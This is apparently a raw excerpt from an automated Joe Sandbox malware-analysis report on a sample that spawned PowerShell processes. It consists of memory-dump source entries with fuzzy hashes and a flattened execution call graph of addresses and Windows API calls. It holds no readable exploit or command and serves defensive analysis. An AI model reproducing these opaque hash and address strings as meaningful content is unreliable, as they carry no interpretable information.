                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 7ac4b47d1b3268db6eae05107117e6e161380a630cb86b889e5472b685a2fb65
                                                                                                                                                                                                                                                                    • Instruction ID: 5e6076539584b4a96713ff76ba095473e975b4b3c1dca375d45a8d78fe121530
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ac4b47d1b3268db6eae05107117e6e161380a630cb86b889e5472b685a2fb65
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD517A32A0CB884FEB58DF2C98955BA7BE1EF9A321F04017EE1C9C3193DA65A407C741
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2317154166.00007FFD32DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DC0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32dc0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 44e186424ece89eecb9dd0198bde3aac57796451adcb7cf1e353cc124896c947
                                                                                                                                                                                                                                                                    • Instruction ID: 13fab4ad85cd4f02210733333e7a4a119960f59f5e992c10d501b3f773c13398
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44e186424ece89eecb9dd0198bde3aac57796451adcb7cf1e353cc124896c947
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8516722F4DA5A4FEBA9CA1C642127477D1EFC5222B4801BBD28FC7197DE18EC018391
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8fb14c11497187f149dd5fff71552f3fbf5590c8677dbe3d3855cd69c01dc863
                                                                                                                                                                                                                                                                    • Instruction ID: eff86a1a9b9e3a6b2d8daca734e31f44763b8f967cb8597ae1f9b882c6389b66
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fb14c11497187f149dd5fff71552f3fbf5590c8677dbe3d3855cd69c01dc863
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50318F31A1CB4C9FDB18DB5CA8466A9BBE0FB99721F00422FE449D3251DA71B855CBC2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2317154166.00007FFD32DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DC0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32dc0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b28bb1120d967f15468d59a7fe05baa165879ea19e8f6a8b2c50e1fa64127483
                                                                                                                                                                                                                                                                    • Instruction ID: 7b03408cc2c1c61be3acc87573b9fdcb172541afde302580d336860f3732315c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b28bb1120d967f15468d59a7fe05baa165879ea19e8f6a8b2c50e1fa64127483
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA214823F4EA674FF7A9C71C7461174A6C1EF84222B4800BAD28FC71A2CE58EC009390
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2317154166.00007FFD32DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DC0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32dc0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 64da73961df2ae5698d46e358be530118d5279eef9c2d6a6a458a77d542ec173
                                                                                                                                                                                                                                                                    • Instruction ID: 57b5e8aa9121d8d6791afa9adad8d7d0f1b3321df6d4617d6bdd4b5010cdc3ed
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64da73961df2ae5698d46e358be530118d5279eef9c2d6a6a458a77d542ec173
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0115932F0D6894FEB55DB9850641787BE1EF89301B1440FFC04DC7183D965A885C3A0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2311100582.00007FFD32BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32BDD000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32bdd000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 1e3156267c1cb7f851df26c493c048c3beed913f440915df7083bd3c27bf145a
                                                                                                                                                                                                                                                                    • Instruction ID: c1920cdc0996b5502f8cf4352bbcb89a9eedf44a468e74fa576099a4335416e7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e3156267c1cb7f851df26c493c048c3beed913f440915df7083bd3c27bf145a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7701A232A0DE088F9658EF2DE085D9577E1FB9432171005AED149CB666DA71F886CB82
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                                                                                                    • Instruction ID: aa51fb53255f554423446ce1cf97bebfc4b08df82c8e877e04e9a6909c02cefe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B01A73120CB0C4FDB48EF0CE091AA6B3E0FB85364F10052DE58AC3651DA32E882CB41
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2311100582.00007FFD32BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32BDD000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32bdd000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
                                                                                                                                                                                                                                                                    • Instruction ID: a43a7a43211d375914338b5fef1c1e8acff13e50b78167d93bcee0651ca178e5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5F0DA34A19E089F8B94EF2DC489D1237F1FB983147510A58E45EC7669D774F891CB81
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2317154166.00007FFD32DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DC0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32dc0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 99f0c04ca68d680442cda4c22ee38c6c3fd16713cf55834f1be9eb0837457bb4
                                                                                                                                                                                                                                                                    • Instruction ID: 2fbba81f7a14c728a7023cd9d6ac7a4fb5feec48f4bb40e83de33307fb1f91e1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99f0c04ca68d680442cda4c22ee38c6c3fd16713cf55834f1be9eb0837457bb4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1F08232B4D5548FEB54EB4CE4514E977E0EF0932271500F6E15EC7563CA69EC44C790
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a8021c4b5bbd8798d50225dd126ea68db524b69ec5a3aeda473a5cb2a4650e85
                                                                                                                                                                                                                                                                    • Instruction ID: 54c601969b4000a35b78f933e79a876f5c3d8ed02f84f32f6230eefd609bb534
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8021c4b5bbd8798d50225dd126ea68db524b69ec5a3aeda473a5cb2a4650e85
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05E01A35944A4C8F8B44EF28D8595E97BE0FB69211B05029BE85DC7121EB719958CBC2
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                                    • API String ID: 0-1162251571
                                                                                                                                                                                                                                                                    • Opcode ID: c9fbb01b56b2e9ce0d5be8d0b4163ac6566ed784f1cca7f2086d9a1525bb6bcd
                                                                                                                                                                                                                                                                    • Instruction ID: dd2fa22c95f3a0503e2a9bd59bb1a9e3b616040388cdd3be0b3614231fdbc24c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9fbb01b56b2e9ce0d5be8d0b4163ac6566ed784f1cca7f2086d9a1525bb6bcd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E731D667F0EAC65FE35602786CB91D93FD0AF11229B0E01F3DAC88B093FD5818169702
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                                    • API String ID: 0-3900292545
                                                                                                                                                                                                                                                                    • Opcode ID: 28452c23105a236aea7841fbe8f9eb5a12d080a4b1de6fa634820144a9efb6f5
                                                                                                                                                                                                                                                                    • Instruction ID: 185c9181ba13584447b0d83c394f03932214002072a675a98e459b6c6cfef77b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28452c23105a236aea7841fbe8f9eb5a12d080a4b1de6fa634820144a9efb6f5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 254175A7F0EAC26FE35646385CB91997F60FF12319B0D02F6C6C48B093E95A1916D712
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                                                                                                                                                                                                    • API String ID: 0-4116931533
                                                                                                                                                                                                                                                                    • Opcode ID: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
                                                                                                                                                                                                                                                                    • Instruction ID: 40453df06017949b544df67dfa46c484536e3dccd3c64e9dc3e268ce1e87c2e9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3521FE67B084265FE31677EDBC205D86780DFA43B674802B3D35CDB603D964609B87C9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000003E.00000002.2401573407.00007FFD32DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DD0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_62_2_7ffd32dd0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f86802104ad8e1f09de69ca34b5c58a1f65c62fb72b0dd594b853d09b8e95623
                                                                                                                                                                                                                                                                    • Instruction ID: f13d5716663724937274a299b6160038e3bda6ebd5a742465eb7e7064c9d4d55
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f86802104ad8e1f09de69ca34b5c58a1f65c62fb72b0dd594b853d09b8e95623
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03C14B22F0EF890FE7A69B2C68601B57BD1EF46611B0941FBD08DC7593E958EC06D3A1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000003E.00000002.2400868446.00007FFD32D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32D00000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_62_2_7ffd32d00000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a3ecbccc1d13eb72a4d301814813b57fc3cc799f17e58eafce89b9ccb0568a1f
                                                                                                                                                                                                                                                                    • Instruction ID: 7e3bfae79926c864b5c86e04681f7bfd5155687ef72ad6d94aa16ce763b7525e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3ecbccc1d13eb72a4d301814813b57fc3cc799f17e58eafce89b9ccb0568a1f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3561E571F09A4D4FDB45EB6CD8556ACBBF1FF4A321F1481AED049D7292CA35A802CB90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000003E.00000002.2401573407.00007FFD32DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DD0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_62_2_7ffd32dd0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d5d0079ecdf05faadc7e0695cd77ee3923b85480c73d0cfd9a3074bdc6b1b370
                                                                                                                                                                                                                                                                    • Instruction ID: 4f291c9459b8050dfbcff369339987afee6651ed47e5464b6c888c0d932319e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5d0079ecdf05faadc7e0695cd77ee3923b85480c73d0cfd9a3074bdc6b1b370
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2412923F4DE4A0FF7999A5C74612B973D2EF88622B4400BFD24EC3593EE59E81192D1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000003E.00000002.2401573407.00007FFD32DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DD0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_62_2_7ffd32dd0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d0c29b96dd4d358214351f8deeeed6acd2a540ad3a0c5678622be89be5976399
                                                                                                                                                                                                                                                                    • Instruction ID: cd3e17b75199e3c16089c06f208ddbdfee0df8299b4f820f8a6616a8046e93a7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0c29b96dd4d358214351f8deeeed6acd2a540ad3a0c5678622be89be5976399
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7741F822F0EF890FE7B5866C64641B47BE1EF46612B4E00FAD54DC7493E958AC0593A1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000003E.00000002.2400868446.00007FFD32D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32D00000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_62_2_7ffd32d00000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                    • Instruction ID: 9aaa6248837e045aaa52870d910bf912ed292abd3f003da0d31d5d6b9124f8ca
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E01A73120CB0C4FDB48EF0CE051AA6B3E0FB85324F10052DE58AC3661D632E881CB41

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:7.8%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                    Signature Coverage:0.5%
                                                                                                                                                                                                                                                                    Total number of Nodes:1191
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:38
                                                                                                                                                                                                                                                                    execution_graph 38227 7ff695cd3b53 38228 7ff695cd3b64 38227->38228 38277 7ff695cf1e80 38228->38277 38229 7ff695cd3c09 38289 7ff695cf23f0 38229->38289 38231 7ff695cd3c18 38299 7ff695cd8050 157 API calls 38231->38299 38232 7ff695cd3bb6 38232->38229 38232->38231 38234 7ff695cd3c01 38232->38234 38294 7ff695cf1c24 38234->38294 38236 7ff695cd3c3d 38300 7ff695cd8010 13 API calls 38236->38300 38238 7ff695cd3ccc 38258 7ff695cd3c90 38238->38258 38307 7ff695cf2414 61 API calls 38238->38307 38239 7ff695cd3c45 38243 7ff695cd3c54 38239->38243 38301 7ff695cecba8 75 API calls 38239->38301 38242 7ff695cd3cf9 38308 7ff695cf1998 138 API calls 38242->38308 38302 7ff695cda9d4 186 API calls wcschr 38243->38302 38247 7ff695cd3d10 38309 7ff695cf18ac 38247->38309 38248 7ff695cd3c5c 38303 7ff695cd93ac 8 API calls 38248->38303 38251 7ff695cd3c66 38252 7ff695cd3c77 38251->38252 38304 7ff695ceca40 61 API calls _CxxThrowException 38251->38304 38305 7ff695cd8090 8 API calls 38252->38305 38256 7ff695cd3c7f 38256->38258 38306 7ff695ceca40 61 API calls _CxxThrowException 38256->38306 38316 7ff695d1d400 48 API calls 38258->38316 38278 7ff695cf1e95 setbuf 38277->38278 38279 7ff695cf1ecb CreateFileW 38278->38279 38280 7ff695cf1f59 GetLastError 38279->38280 38281 7ff695cf1fb8 38279->38281 38317 7ff695d04534 38280->38317 38283 7ff695cf1fd9 SetFileTime 38281->38283 38285 7ff695cf1ff7 38281->38285 38283->38285 38329 7ff695d2a610 38285->38329 38287 7ff695cf1f78 CreateFileW GetLastError 38287->38281 38343 7ff695cf24e8 38289->38343 38292 7ff695cf240e 38292->38238 38295 7ff695cf1c37 38294->38295 38297 7ff695cf1c3b 38294->38297 38295->38229 38296 7ff695cf1c5d 38360 7ff695cf2d6c 12 API calls 2 library calls 38296->38360 38297->38295 38297->38296 38299->38236 38300->38239 38302->38248 38303->38251 38304->38252 38305->38256 38306->38258 38307->38242 38308->38247 38310 7ff695cf18ca 38309->38310 38315 7ff695cf18db 38309->38315 38311 7ff695cf18de 38310->38311 38312 7ff695cf18d6 38310->38312 38310->38315 38361 7ff695cf1930 38311->38361 38313 7ff695cf1c24 12 API calls 38312->38313 38313->38315 38315->38258 38318 7ff695d04549 setbuf 38317->38318 38328 7ff695d045a2 38318->38328 38338 7ff695d0472c CharUpperW 38318->38338 38320 7ff695d04579 38339 7ff695d04760 CharUpperW 38320->38339 38321 7ff695d2a610 _handle_error 8 API calls 38322 7ff695cf1f74 38321->38322 38322->38281 38322->38287 38324 7ff695d04592 38325 7ff695d0459a 38324->38325 38326 7ff695d04629 GetCurrentDirectoryW 38324->38326 38340 7ff695d0472c CharUpperW 38325->38340 38326->38328 38328->38321 38330 7ff695d2a61a 38329->38330 38331 7ff695cf203a 38330->38331 38332 7ff695d2a6a0 IsProcessorFeaturePresent 38330->38332 38331->38232 38333 7ff695d2a6b7 38332->38333 38341 7ff695d2a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38333->38341 38335 7ff695d2a6ca 38342 7ff695d2a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38335->38342 38338->38320 38339->38324 38340->38328 38341->38335 38349 7ff695cf1af0 38343->38349 38346 7ff695cf23f9 38346->38292 38348 7ff695ceca40 61 API calls _CxxThrowException 38346->38348 38348->38292 38350 7ff695cf1b01 setbuf 38349->38350 38351 7ff695cf1b6f CreateFileW 38350->38351 38352 7ff695cf1b68 38350->38352 38351->38352 38353 7ff695cf1be1 38352->38353 38354 7ff695d04534 10 API calls 38352->38354 38356 7ff695d2a610 _handle_error 8 API calls 38353->38356 38355 7ff695cf1bb3 38354->38355 38355->38353 38357 7ff695cf1bb7 CreateFileW 38355->38357 38358 7ff695cf1c14 38356->38358 38357->38353 38358->38346 38359 7ff695ceca08 10 API calls 38358->38359 38359->38346 38360->38295 38363 7ff695cf194c 38361->38363 38365 7ff695cf1964 38361->38365 38362 7ff695cf1988 38362->38315 38364 7ff695cf1958 CloseHandle 38363->38364 38363->38365 38364->38365 38365->38362 38367 7ff695cec9d0 10 API calls 38365->38367 38367->38362 38368 7ff695cd1884 38500 7ff695d034e4 38368->38500 38371 7ff695cd1926 38373 7ff695cd195b 38371->38373 38564 7ff695d03f98 63 API calls 2 library calls 38371->38564 38372 7ff695d034e4 CompareStringW 38374 7ff695cd18a6 38372->38374 38380 7ff695cd1970 38373->38380 38565 7ff695cf2ed8 100 API calls 3 library calls 38373->38565 38376 7ff695d034e4 CompareStringW 38374->38376 38382 7ff695cd18b9 38374->38382 38376->38382 38379 7ff695cd1915 38563 7ff695ceca40 61 API calls _CxxThrowException 38379->38563 38383 7ff695cd19b8 38380->38383 38566 7ff695d149f4 48 API calls 38380->38566 38382->38371 38562 7ff695cd1168 8 API calls 2 library calls 38382->38562 38504 7ff695cd5450 38383->38504 38385 7ff695cd19b0 38567 7ff695ce8444 54 API calls fflush 38385->38567 38391 7ff695cd72c4 76 API calls 38392 7ff695cd1a12 38391->38392 38393 7ff695cd1b04 38392->38393 38394 7ff695cd1ae6 38392->38394 38542 7ff695ce6c94 38393->38542 38538 7ff695cd7514 38394->38538 38397 7ff695cd1af2 38398 7ff695cd7514 72 API calls 38397->38398 38399 7ff695cd1aff 38398->38399 38400 7ff695d2a610 _handle_error 8 API calls 38399->38400 38402 7ff695cd2f97 38400->38402 38401 7ff695cd1b13 38558 7ff695cd7148 38401->38558 38404 7ff695cd1c71 38405 7ff695cd1ca7 38404->38405 38406 7ff695cd63e8 8 API calls 38404->38406 38407 7ff695cd1ce4 38405->38407 38408 7ff695cd1cd5 38405->38408 38409 7ff695cd1c91 38406->38409 38410 7ff695d2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38407->38410 38412 7ff695d2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38408->38412 38411 7ff695cd49b8 99 API calls 38409->38411 38416 7ff695cd1cee 38410->38416 38413 7ff695cd1c9d 38411->38413 38412->38416 38414 7ff695cd63e8 8 API calls 38413->38414 38414->38405 38415 7ff695cd1d50 38418 7ff695d2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38415->38418 38416->38415 38417 7ff695d1de30 72 API calls 38416->38417 38417->38415 38419 7ff695cd1d62 38418->38419 38420 7ff695d1dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38419->38420 38421 7ff695cd1d7b 38419->38421 38420->38421 38422 7ff695d22bcc 66 API calls 38421->38422 38423 7ff695cd1dba 38422->38423 38495 7ff695cfae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38423->38495 38424 7ff695cd1e1c 38426 7ff695cd10c0 8 API calls 38424->38426 38428 7ff695cd1e5d 38424->38428 38425 7ff695cd1dde std::bad_alloc::bad_alloc 38425->38424 38427 7ff695d2ba34 _CxxThrowException RtlPcToFileHeader RaiseException 38425->38427 38426->38428 38427->38424 38429 7ff695cda410 159 API calls 38428->38429 38494 7ff695cd1ef4 38428->38494 38429->38494 38430 7ff695cd2ccc 38431 7ff695cd2d0c 38430->38431 38496 7ff695cf8c80 72 API calls 38430->38496 38432 7ff695d1de30 72 API calls 38431->38432 38441 7ff695cd2d21 38431->38441 38432->38441 38433 7ff695cf6688 48 API calls 38433->38494 38434 7ff695cd2d86 38439 7ff695d149f4 48 API calls 38434->38439 38476 7ff695cd2dd0 38434->38476 38435 7ff695d1b6d0 73 API calls 38492 7ff695cd2005 38435->38492 38436 7ff695cd5e70 169 API calls 38436->38492 38437 7ff695ce8444 54 API calls 38437->38492 38438 7ff695cda504 208 API calls 38438->38476 38442 7ff695cd2d9e 38439->38442 38440 7ff695cd80e4 192 API calls 38440->38476 38441->38434 38443 7ff695d149f4 48 API calls 38441->38443 38445 7ff695ce8444 54 API calls 38442->38445 38447 7ff695cd2d6c 38443->38447 38444 7ff695cd5928 237 API calls 38444->38492 38448 7ff695cd2da6 38445->38448 38446 7ff695cf7c7c 127 API calls 38446->38476 38449 7ff695d149f4 48 API calls 38447->38449 38458 7ff695cf1c24 12 API calls 38448->38458 38454 7ff695cd2d79 38449->38454 38450 7ff695cde6c8 157 API calls 38450->38494 38451 7ff695cee21c 63 API calls 38451->38492 38452 7ff695cd1168 8 API calls 